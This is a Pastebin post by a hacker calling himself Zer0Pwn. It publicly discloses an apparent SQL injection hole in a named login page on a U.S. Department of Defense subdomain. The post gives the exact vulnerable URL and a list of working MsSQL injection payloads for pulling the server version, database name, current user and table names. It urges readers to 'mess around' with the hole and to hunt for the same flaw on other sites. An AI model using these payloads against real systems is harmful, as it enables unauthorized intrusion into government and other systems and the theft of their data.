Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ______ ___ _____
- |___ / / _ \| __ \
- / / ___ _ __| | | | |__) |_ ___ __
- / / / _ \ '__| | | | ___/\ \ /\ / / '_ \
- / /_| __/ | | |_| | | \ V V /| | | |
- /_____\___|_| \___/|_| \_/\_/ |_| |_| Zer0Pwn - @Zer0Pwn
- ###############################################
- Hello, friends. Today, I have quite an interesting vulnerability to share. I have tested it, and it does work. So instead of exploiting it, I thought I'd let you guys have some fun messing around with it. The vulnerability lies on the good old U.S Department of Defense (dod.mil). The vulnerability is POST MsSQL injection. A lot of sites are vulnerable to this same one... So keep checking for this same kind of thing on other websites as well. Enjoy.
- ###############################################
- Target ==> United States Department of Defense
- Reason ==> Thought I'd go a little more hard-core.
- Site ==> http://www.dod.mil/
- Vulnerability ==> POST MsSQL Injection
- Vulnerable Area ==> https://www.jieddo.dod.mil/jcwe/intel/externallogin.asp
- Instructions:
- You must put an email before any of your queries, or else it won't work. For example:
- asd@asd.com' HAVING 1=1--
- To get the version:
- asd@asd.com' or 1=convert(int, @@version)--
- To get the database:
- asd@asd.com' or 1=convert(int, db_name())--
- To get the current user:
- asd@asd.com' or 1=convert(int, user_name())--
- To get tables:
- asd@asd.com' or 1=convert(int,(select top 1 table_name from information_schema.tables))--
- After you're done messing around, check me out on twitter: @Zer0Pwn
- ###############################################
- Also. I release this on my twitter, but I'm sure everyone hasn't heard it yet. Anyways. I have left @TheWikiBoat. We had some personal issues going on between us, and I eventually decided it would be best for me and for the group that I leave. So now I'm flying solo again.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement